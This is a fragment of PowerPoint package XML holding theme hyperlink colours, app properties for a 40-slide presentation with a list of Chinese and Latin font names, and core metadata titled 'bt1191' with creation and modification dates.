        <a:srgbClr val="29ABE2"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="C8C8C8"/>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4167</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>自定义</PresentationFormat>
  <Paragraphs>411</Paragraphs>
  <Slides>40</Slides>
  <Notes>40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40</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="50" baseType="lpstr">
      <vt:lpstr>华文楷体</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>新宋体</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</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bt1191</dc:title>
  <dc:creator/>
  <cp:lastModifiedBy/>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-02-21T13:09:17Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-02-09T10:53:01Z</dcterms:modified>
</cp:coreProperties>
</file>